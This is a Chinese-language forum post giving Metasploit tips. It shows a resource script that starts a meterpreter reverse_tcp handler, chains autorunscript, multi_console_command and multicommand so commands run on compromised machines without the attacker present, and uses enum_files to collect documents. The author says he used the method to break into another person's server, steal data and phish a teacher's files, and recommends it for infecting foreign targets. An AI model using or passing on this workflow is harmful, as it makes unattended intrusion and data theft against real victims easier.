0x00 前言
本文差不多算是一些和msf有关的小技巧,当然了也可以说是经验,下面分享给大家,知道的就别喷我了,总有人不知道的~
0x01 简介
0# msfconsole -r
0# 是msf的启动参数
1# set exitonsession
2# set autorunscript + script
1# 2#是handler的option 其实可以在show advance里面找到
3# multi_console_command
4# multicommand
3# 4#是msf自带的script
0# 首先讲一下msfconsole在启动时候有一个-r的参数,这个-r呢可以让我们在msf启动的时候自动执行一系列东西,比如说举个例子,现在在/root/目录下面有个叫1.rb的文件
cat 1.rb
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.1.101
run -j
jobs
这时我们就可以直接使用# msfconsole -r 1.rb启动msf,然后新打开的msf的窗口就会自动执行你的命令了,其实吧就跟批处理一样的
1# 效果是让msf开的handler在send一个stager之后依旧保持job的存活,不然有时候会错失许多的良机,当然了有时候也会带来某些不必要的风险。具体的使用命令是
msf > set exitonsession false
这样以后就不会自动结束掉job了
2# 其实是今天的重头戏了,功能是让目标机器上线之后,会自动执行一个script(就是本来应该是使用 run 启动的script),比如set autorunscript
killav虽然自带的killav好像并没有什么卵用。注意,此处没有run
msf > set autorunscript multi_console_command -r 1.rc
3# 这条其实是让我们执行meterpreter的命令例如getpid getuid这种,所以我们可以和之前的autorunscript打出一套组合拳
有两个常用参数并且给出eg:
msf > cat 1.rc
[*] exec: cat 1.rc
getpid
getuid
meterpreter > run multi_console_command -r 1.rc
[] Running Command List …
[] Running command getpid
Current pid: 728
[*] Running command getuid
Server username: 8GYE3LE6Q2BXJ9B\Administrator
meterpreter > run multi_console_command -c getpid
[] Running Command List …
[] Running command getpid
Current pid: 728
其实吧 -r 选项基本上就可以替代掉 -c 了
4# 这条是让我们去执行shell的命令,比如cmd下面的命令了,其实可以直接把这条加到3#的rc文档里面,然后用multi_console_command来执行multicommand,下面给eg:
msf > cat 2.rc
[*] exec: cat 2.rc
run multicommand -r 3.rc
msf > cat 3.rc
[*] exec: cat 3.rc
whoami
meterpreter > run multi_console_command -r 2.rc
[] Running Command List …
[] Running command run multicommand -r 3.rc
[] Running Command List …
[] running command whoami
[]
[] *****************************************
[] Output of whoami
[] *****************************************
[*] 8gye3le6q2bxj9b\administrator
0x02 乱七八糟和总结
先讲一下我最初弄这个的动机,2379那天跟我说他找到一台黑阔(黑产大牛)的服务器有shift后门,我就想着偷偷的去人家机器上偷点儿shell回来,然后dump回来练习提权
然后呢2379已经直接给种上cs的马子了,机器上并没有杀软,我最初是准备用简单的方法直接批处理搜索.txt然后打印路径批量下载完事的,但我嘛,总想弄点高逼格的东西,于是就去看了下msf
然后说一下今天分享的有啥用,其实这个东西是一个很好用的思路,毕竟你有的时候要去干一些类社工之类的事情(当然了我这是非常低级的),比如给外国人种马啊什么,毕竟有好几个小时的时差嘛,没有办法随时守在电脑身边,所以我们需要一系列自动化的操作。
由此以上一套组合拳,基本上可以实现自动批量执行meterpreter和shell的命令
我自己用这个思路成功地大佬的东西都dump下来了 然后还顺手从我的法国老师手上拿(tou)到了某些文档,然而并不是试卷。这个具体就不是很好跟大家分享,大致就是邮件钓鱼。。。
首先给出我自己找到的enum_files_new.rb(这个不是原创了)扔到附件了
使用方法:
run post/windows/gather/enum_files FILE_GLOBS=.xls SEARCH_FROM=
run post/windows/gather/enum_files FILE_GLOBS=.xls;.pdf SEARCH_FROM=C:/
tip1: msf的autorunscript是和Job一一对应的,所以我们可以利用不同端口的马操作不同的autoscript
tip2: 一定要注意这些命令和run的搭配关系,毕竟运行script之前是需要run命令的,请大家在使用前尽量本地测试一下
tip3: 可以利用那些批量处理打造出一种自动维权,尤其是在migrate经常不好使的情况下
tip4: msf5可以直接用handler命令启动handler了,具体大家自己查一下吧
tip5: 希望90越来越好,小菜鸡抛砖引玉了,各位大佬别喷我,我好哭,其中可能有些许错误,希望大家包含,谢咯~